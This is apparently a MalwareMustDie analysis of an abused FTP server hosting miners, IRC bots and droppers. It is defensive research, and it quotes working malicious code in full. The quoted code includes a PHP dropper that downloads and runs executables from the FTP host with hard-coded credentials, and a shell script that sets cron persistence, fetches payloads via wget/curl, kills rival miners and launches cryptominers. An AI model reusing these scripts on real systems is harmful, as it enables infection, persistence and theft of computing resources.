Case #8 - Journey to Abused FTP

// MalwareMustdie - Case #8
// Report base: Jorney to hacked FTP sites, url:
// http://blog.malwaremustdie.org/2014/05/a-journey-to-abused-ftp-sites-story-of.html
// http://blog.malwaremustdie.org/2014/06/a-journey-to-abused-ftp-sites-story-of.html
// Samples: http://www.mediafire.com/download/agkazxpg4ie3eqg/Case8-PErl-miners.7z

$ curl ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/^
-rwxr-xr-x   1 root     root          872 May 20 00:55 a
-rw-r--r--   1 root     root         1008 May 20 00:56 bot
-rw-r--r--   1 padlezardftp psacln      15138 Apr 16 12:33 botphp
-rwxr-xr-x   1 root     root          283 May  2 04:25 c
-rwxr-xr-x   1 root     root       379680 Dec  3  2013 clamav
-rw-r--r--   1 padlezardftp psacln     753161 Feb 27 07:19 iexplorer.exe
-rw-r--r--   1 padlezardftp psacln     671836 Mar 19 10:35 init.exe
-rwxr-xr-x   1 root     root        15700 Mar 12 05:33 lol
-rw-r--r--   1 padlezardftp psacln     751993 Apr 24 12:26 ovi.exe
-rw-r--r--   1 root     root        26585 Jun  1 19:56 php
-rw-r--r--   1 root     root        15713 Apr 30 01:34 plm
-rw-r--r--   1 root     root        26548 Jun  1 10:16 s0nia
-rwxr-xr-x   1 root     root       518288 Dec  3  2013 sh
-rwxr-xr-x   1 root     root          283 May  2 04:25 update
-rwxr-xr-x   1 root     root       319292 Sep 30  2013 upx

// check ELF:

$ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep ELF
clamav: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x11473c67e3bd026f1c3ce7458b836b15498365c4, stripped
sh:     ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0xb7880c540a3530b2831b1618512b5f90269151b8, stripped
upx:    ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
$

// Check PE:

$ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep PE
iexplorer.exe: PE32 executable (GUI) Intel 80386, for MS Windows
init.exe:      PE32 executable (GUI) Intel 80386, for MS Windows
ovi.exe:       PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
$

// Check PHP:

$ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep PHP
bot:           PHP script, ASCII text
$

// Check Perl Script:

$ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep Perl
lol:           Perl script, ASCII text executable
plm:           Perl script, ASCII text executable
$

// Check other formats:

$ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep  -v ^ELF\|PE\|PHP\|Perl^
 a:             POSIX shell script, ASCII text executable
botphp:        C++ source, ASCII text
c:             POSIX shell script, ASCII text executable
php:           data
s0nia:         data
 update:        POSIX shell script, ASCII text executable
$

// The ELFs:

// upx - real one..

.rodata:0x080C6680 0x0042  unsigned int upx_adler32(const void*, unsigned int, unsigned int)
.rodata:0x080C66E0 0x00A5  int upx_compress(const unsigned char*, unsigned int, unsigned char*, unsigned int*, upx_callback_t*, int, int, const upx_compress_config_t*, upx_compress_result_t*)
.rodata:0x080C67A0 0x0079  int upx_decompress(const unsigned char*, unsigned int, unsigned char*, unsigned int*, int, const upx_compress_result_t*)
.rodata:0x080C6820 0x008F  int upx_test_overlap(const unsigned char*, const unsigned char*, unsigned int, unsigned int, unsigned int*, int, const upx_compress_result_t*)
.rodata:0x080C9371 0x00AA     Ultimate Packer for eXecutables\n      Copyright (C) 1996 - %s\nUPX %-10s  Markus Oberhumer, Laszlo Molnar & John Reiser  %14s\n\n
.rodata:0x080C941B 0x0039  Usage: %s [-123456789dlthVL] [-qvfk] [-o file] %sfile..\n
.rodata:0x080C947B 0x000C  \nCommands:\n
.rodata:0x080C9491 0x0034    --best compress best (can be slow for big files)\n

// clamav - actually is a ^minerd^ - bitcoin mining ELF

.rodata:0x08096848 0x002B  Try `minerd --help^ for more information.\n
.rodata:0x08096874 0x06A9  Usage: minerd [OPTIONS]\nOptions:\n  -a, --algo=ALGO       specify the algorithm to use\n                          scrypt    scrypt(1024, 1, 1) (default)\n                          sha256d   SHA-256d\n  -o, --url=URL         URL of mining server (default: http://127.0.0.1:9332/)\n  -O, --userpass=U:P    username:password pair for mining server\n  -u, --user=USERNAME   username for mining server\n  -p, --pass=PASSWORD   password for mining server\n      --cert=FILE       certificate for mining server using SSL\n  -x, --proxy=[PROTOCOL://]HOST[:PORT]  connect through a proxy\n  -t, --threads=N       number of miner threads (default: number of processors)\n  -r, --retries=N       number of times to retry if a network call fails\n                          (default: retry indefinitely)\n
                            -R, --retry-pause=N   time to pause between retries, in seconds (default: 0)\n  -T, --timeout=N       network timeout, in seconds (default: 270)\n  -s, --scantime=N      upper bound on time spent s
.rodata:0x08096F20 0x002A  accepted: %lu/%lu (%.2f%%), %s khash/s %s
.rodata:0x08096F4C 0x002D  DEBUG: job_id=^%s^ extranonce2=%s ntime=%08x
.rodata:0x08096F7C 0x001F  Stratum connection interrupted
.rodata:0x08096F9C 0x002E  {\^method\^: \^getwork\^, \^params\^: [], \^id\^:0}\r\n
.rodata:0x08096FCC 0x0027  DEBUG: stale work detected, discarding
.rodata:0x08096FF4 0x004E  {\^method\^: \^mining.submit\^, \^params\^: [\^%s\^, \^%s\^, \^%s\^, \^%s\^, \^%s\^], \^id\^:4}
.rodata:0x08097044 0x002E  submit_upstream_work stratum_send_line failed
.rodata:0x08097074 0x0034  {\^method\^: \^getwork\^, \^params\^: [ \^%s\^ ], \^id\^:1}\r\n
.rodata:0x080970A8 0x002A  submit_upstream_work json_rpc_call failed

// sh - is also a ^minerd^, below is different ^better^ vector to string the bins:

.rodata:0x06C318  Usage: minerd [OPTIONS]
.rodata:0x06C330  Options:
.rodata:0x06C339    -a, --algo=ALGO       specify the algorithm to use
.rodata:0x06C36E                            scrypt    scrypt(1024, 1, 1) (default)
.rodata:0x06C3AF                            sha256d   SHA-256d
.rodata:0x06C3DC    -o, --url=URL         URL of mining server (default: http://127.0.0.1:9332/)
.rodata:0x06C42B    -O, --userpass=U:P    username:password pair for mining server
.rodata:0x06C46C    -u, --user=USERNAME   username for mining server
.rodata:0x06C49F    -p, --pass=PASSWORD   password for mining server
.rodata:0x06C4D2        --cert=FILE       certificate for mining server using SSL
.rodata:0x06C512    -x, --proxy=[PROTOCOL://]HOST[:PORT]  connect through a proxy
.rodata:0x06C552    -t, --threads=N       number of miner threads (default: number of processors)
.rodata:0x06C5A2    -r, --retries=N       number of times to retry if a network call fails
.rodata:0x06C5EB                            (default: retry indefinitely)
.rodata:0x06C623    -R, --retry-pause=N   time to pause between retries, in seconds (default: 30)
.rodata:0x06C673    -T, --timeout=N       network timeout, in seconds (default: 270)
.rodata:0x06C6B6    -s, --scantime=N      upper bound on time spent scanning current work when
.rodata:0x06C703                            long polling is unavailable, in seconds (default: 5)
.rodata:0x06C752        --no-longpoll     disable X-Long-Polling support
.rodata:0x06C789        --no-stratum      disable X-Stratum support
.rodata:0x06C7BB    -q, --quiet           disable per-thread hashmeter output
.rodata:0x06C7F7    -D, --debug           enable debug output
.rodata:0x06C823    -P, --protocol-dump   verbose dump of protocol-level activities
.rodata:0x06C865    -S, --syslog          use system log for output messages
.rodata:0x06C8A0    -B, --background      run the miner in the background
.rodata:0x06C8D8        --benchmark       run in offline benchmark mode
.rodata:0x06C90E    -c, --config=FILE     load a JSON-format configuration file
.rodata:0x06C94C    -V, --version         display version information and exit
.rodata:0x06C989    -h, --help            display this help text and exit
.rodata:0x06C9C8  accepted: %lu/%lu (%.2f%%), %s khash/s %s
.rodata:0x06C9F8  DEBUG: job_id=^%s^ extranonce2=%s ntime=%08x
.rodata:0x06CA28  Stratum connection interrupted
.rodata:0x06CA48  {^method^: ^getwork^, ^params^: [], ^id^:0}
.rodata:0x06CA78  DEBUG: stale work detected, discarding
.rodata:0x06CAA0  {^method^: ^mining.submit^, ^params^: [^%s^, ^%s^, ^%s^, ^%s^, ^%s^], ^id^:4}
.rodata:0x06CAF0  submit_upstream_work stratum_send_line failed
.rodata:0x06CB20  {^method^: ^getwork^, ^params^: [ ^%s^ ], ^id^:1}

// The PE are bitcoin Miner..

https://www.virustotal.com/en/file/a343e06a05b863730ec07bbe02c8f3989669afd588603ecca64a73f2db6ed777/analysis/1397692298/
https://www.virustotal.com/en/file/2c5146d815d387fd214a9fbdf5e95885f31512744be4b74b57cac8958e062d07/analysis/1400526645/
https://www.virustotal.com/en/file/eb952920fb9104de08f661a47d76dc7ad5806fc90b2f3a1579da288bdc08066f/analysis/1401094548/

// THE PHP is the script to infect OTHER hosts with init.exe

<?php
$win_local_file = ^c:\windows\init.exe^;
$lin_local_file = ^/tmp/a^;
$win_server_file = ^/httpdocs/init.exe^;
$lin_server_file = ^/httpdocs/a^;
$ftp_server = ^84.246.227.121^;
$ftp_user_name = ^padlezardftp^;
$ftp_user_pass = ^123456^;
$result = exec(^sh /tmp/a^);

echo php_uname();
echo PHP_OS;

if (strtoupper(substr(PHP_OS, 0, 3)) === ^WIN^) {
  $conn_id = ftp_connect($ftp_server);
  $login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
  if (ftp_get($conn_id, $win_local_file, $win_server_file, FTP_BINARY)) {
    echo ^Successfully written to $local_file\n^;
    echo exec(^c:\windows\init.exe &del c:\windows\init.exe^);
} else {
    echo ^There was a problem\n^;
}
ftp_close($conn_id);

} else {
  $conn_id = ftp_connect($ftp_server);
  $login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
  if (ftp_get($conn_id, $lin_local_file, $lin_server_file, FTP_BINARY)) {
        echo ^$result^;
} else {
    echo ^There was a problem\n^;
}
ftp_close($conn_id);
}
?>

// THE PERLs...

The ^lol^ and ^pLm^ contains the same code.
Is an IRC PerlBot used to spread the infection for these miners.
It has the Webapp vuln scanning, standard flood (TCP & UDP) and
Basic HTTP DoS Flood function. Remoted by IRC or Shell.
The code is here: http://pastebin.com/VQVzw7f9

This perl bot is aiming this RFI. Found one, exploit it, then use the PHP script above
to download the shits to new infect host.

Vulnerable aimed is hinted by the bot scan
query=^/SQuery/lib/gore.php?libpath=^
Reference: http://www.exploit-db.com/exploits/2003/
More ref: https://www.google.com/search?q=%2FSQuery%2Flib%2Fgore.php%3Flibpath%3D&ie=utf-8&oe=utf-8&client=ubuntu&channel=fs&gws_rd=ssl#channel=fs&nfpr=1&q=%2FSQuery%2Flib%2Fgore.php%3Flibpath%3D …

// The way the attacker executed these files in this FTP is well described
// in file ^a^:

#!/bin/sh
crontab -r
cd /tmp
rm -rf a* c* update*
pwd > mech.dir
dir=$(cat mech.dir)
echo ^* * * * * $dir/update >/dev/null 2>&1^ > cron.d
crontab cron.d
crontab -l | grep update
wget http://padlezard.com/update >> /dev/null &&
curl -O http://padlezard.com/update >> /dev/null &&
chmod u+x update
#chattr -ia bash
#chattr -ia *
curl -O http://padlezard.com/clamav
curl -O http://padlezard.com/sh
wget http://padlezard.com/clamav
wget http://padlezard.com/sh
wget http://padlezard.com/plm
curl -O http://padlezard.com/plm
perl plm
rm -rf plm*
chmod +x sh
chmod +x clamav
mv clamav bash
#kill -9 `ps x|grep miner|grep -v grep|awk ^{print $1}^`
kill -9 `ps x|grep stratum|grep -v grep|awk ^{print $1}^`
killall -9 kav m32 m64
./bash -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B
./sh -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B
#chattr +ia bash
#chattr +ia sh

// Obviously via ^update^ that called GET HTTP in a compromised site
// a (and ^c^) download request was sent to get this ^a^(and ^c^)  to get the miners
// and kicking the Perl bot scanner:

#!/bin/sh
plm=`ps x|grep 176.31.255.138:3333|grep -v grep|awk ^{print $7}^`
if [ ^$plm^ != ^^ ]
        then echo ^MERGE!!!^
                else
    echo ^Starting!!!^
        wget http://padlezard.com/a && sh a >> /dev/null &
    curl -O http://padlezard.com/a && sh a >> /dev/null &
fi

// The CNC of this malicious operation is in 176.31.255.138:3333
// again.. ahilarious famous malware gargabe can..The OVH, France:

Req time: Wed Jun  4 22:50:59 JST 2014
UP: 176.31.255.138
Result: ns388807.ovh.net.|16276 | 176.31.0.0/16 | OVH | FR | OVH.COM | OVH SAS

// There is another PHP pbot code called ^phpbot^
is the older version, of pbot , no DDoS L7 HTTP functions

// There are two more Perl^s PowerBot IRC Bot
// in file called ^s0nia^ and ^php^
Functions: Hacked the server important dirs (removal),
UDP DoS, PortScanner, File Downloader, Shell Backdoor(backconnect), IRC attacks,

// code for these Perl PowerBot is here:
http://pastebin.com/iJX3xaNF

-----
#MalwareMustDie!!!!!!!!!